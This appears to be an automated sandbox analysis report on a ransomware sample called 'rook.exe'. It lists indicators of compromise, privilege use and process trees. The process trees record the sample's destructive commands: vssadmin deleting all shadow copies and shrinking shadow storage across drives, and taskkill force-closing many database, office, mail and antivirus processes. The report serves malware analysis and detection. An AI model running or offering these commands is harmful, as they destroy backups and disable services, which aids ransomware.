Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{74577943-FB21-431C-8A5C-84B7009078E9}	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{34A08B02-F469-4BBB-9378-E0B95B3F86BB}	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{5F4C78D8-36BF-4FAA-91E5-D8C9DCD65416}	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2045521122-590294423-3465680274-1000\{AEEE377B-FAB5-47AE-8D58-6634CA76ECDE}	explorer.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4192	taskkill.exe
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeDebugPrivilege	2188	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	3324	taskkill.exe
Token: SeDebugPrivilege	812	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	4824	taskkill.exe
Token: SeDebugPrivilege	1864	taskkill.exe
Token: SeDebugPrivilege	4112	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	3632	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	732	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	2908	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	5008	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	4712	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	3596	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	3312	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	2244	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	3320	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	3772	taskkill.exe
Token: SeDebugPrivilege	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
Token: SeShutdownPrivilege	3948	RuntimeBroker.exe
Token: SeShutdownPrivilege	3948	RuntimeBroker.exe
Token: SeBackupPrivilege	15452	vssvc.exe
Token: SeRestorePrivilege	15452	vssvc.exe
Token: SeAuditPrivilege	15452	vssvc.exe
Token: SeShutdownPrivilege	16420	explorer.exe
Token: SeCreatePagefilePrivilege	16420	explorer.exe
Token: SeShutdownPrivilege	16420	explorer.exe
Token: SeCreatePagefilePrivilege	16420	explorer.exe
Token: SeShutdownPrivilege	16420	explorer.exe
Token: SeCreatePagefilePrivilege	16420	explorer.exe
Token: SeShutdownPrivilege	16420	explorer.exe
Token: SeCreatePagefilePrivilege	16420	explorer.exe
Token: SeShutdownPrivilege	16420	explorer.exe
Token: SeCreatePagefilePrivilege	16420	explorer.exe
Token: SeShutdownPrivilege	3756	DllHost.exe
Token: SeCreatePagefilePrivilege	3756	DllHost.exe
Token: SeShutdownPrivilege	16420	explorer.exe
Token: SeCreatePagefilePrivilege	16420	explorer.exe

Suspicious use of FindShellTrayWindow 17 IoCs

pid	Process
15384	sihost.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe

Suspicious use of SendNotifyMessage 11 IoCs

pid	Process
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe
16420	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2360	StartMenuExperienceHost.exe
17404	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 4192	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	87
PID 1840 wrote to memory of 4192	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	87
PID 1840 wrote to memory of 4456	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	364
PID 1840 wrote to memory of 4456	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	364
PID 1840 wrote to memory of 2188	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	306
PID 1840 wrote to memory of 2188	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	306
PID 1840 wrote to memory of 3324	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	705
PID 1840 wrote to memory of 3324	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	705
PID 1840 wrote to memory of 2252	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	479
PID 1840 wrote to memory of 2252	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	479
PID 1840 wrote to memory of 1724	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	726
PID 1840 wrote to memory of 1724	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	726
PID 1840 wrote to memory of 2036	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	589
PID 1840 wrote to memory of 2036	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	589
PID 1840 wrote to memory of 812	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	432
PID 1840 wrote to memory of 812	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	432
PID 1840 wrote to memory of 1696	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	631
PID 1840 wrote to memory of 1696	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	631
PID 1840 wrote to memory of 4824	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	730
PID 1840 wrote to memory of 4824	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	730
PID 1840 wrote to memory of 1864	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	695
PID 1840 wrote to memory of 1864	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	695
PID 1840 wrote to memory of 4112	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	110
PID 1840 wrote to memory of 4112	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	110
PID 1840 wrote to memory of 3456	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	661
PID 1840 wrote to memory of 3456	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	661
PID 1840 wrote to memory of 3632	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	282
PID 1840 wrote to memory of 3632	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	282
PID 1840 wrote to memory of 636	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	351
PID 1840 wrote to memory of 636	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	351
PID 1840 wrote to memory of 1080	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	120
PID 1840 wrote to memory of 1080	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	120
PID 1840 wrote to memory of 732	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	251
PID 1840 wrote to memory of 732	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	251
PID 1840 wrote to memory of 940	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	517
PID 1840 wrote to memory of 940	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	517
PID 1840 wrote to memory of 2908	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	697
PID 1840 wrote to memory of 2908	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	697
PID 1840 wrote to memory of 2136	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	598
PID 1840 wrote to memory of 2136	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	598
PID 1840 wrote to memory of 3968	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	313
PID 1840 wrote to memory of 3968	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	313
PID 1840 wrote to memory of 4348	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	132
PID 1840 wrote to memory of 4348	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	132
PID 1840 wrote to memory of 740	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	357
PID 1840 wrote to memory of 740	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	357
PID 1840 wrote to memory of 3904	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	278
PID 1840 wrote to memory of 3904	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	278
PID 1840 wrote to memory of 5008	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	418
PID 1840 wrote to memory of 5008	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	418
PID 1840 wrote to memory of 2092	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	507
PID 1840 wrote to memory of 2092	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	507
PID 1840 wrote to memory of 2224	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	625
PID 1840 wrote to memory of 2224	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	625
PID 1840 wrote to memory of 4712	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	659
PID 1840 wrote to memory of 4712	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	659
PID 1840 wrote to memory of 1676	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	201
PID 1840 wrote to memory of 1676	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	201
PID 1840 wrote to memory of 2540	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	721
PID 1840 wrote to memory of 2540	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	721
PID 1840 wrote to memory of 3112	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	714
PID 1840 wrote to memory of 3112	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	714
PID 1840 wrote to memory of 2684	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	475
PID 1840 wrote to memory of 2684	1840	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	475

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Drops startup file
- Drops file in Program Files directory
- Modifies registry class
PID:2852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:12972
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:15420
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:15596
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:15620
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:15656
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:15748
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16428
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16516
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16564
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16620
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16700
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16740
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:16984
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:17072
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:17216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2912

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:10268
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:13324
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:13404
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:13608
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:9976
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:9696
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:9536
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:10556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:10572
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:17420
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:17448
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:17492
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:17572
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:17608
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:17636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4032

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4084

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2120

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4260

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4192
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3324
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3632
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:732
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4712
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2540
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3596
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3312
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:456
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
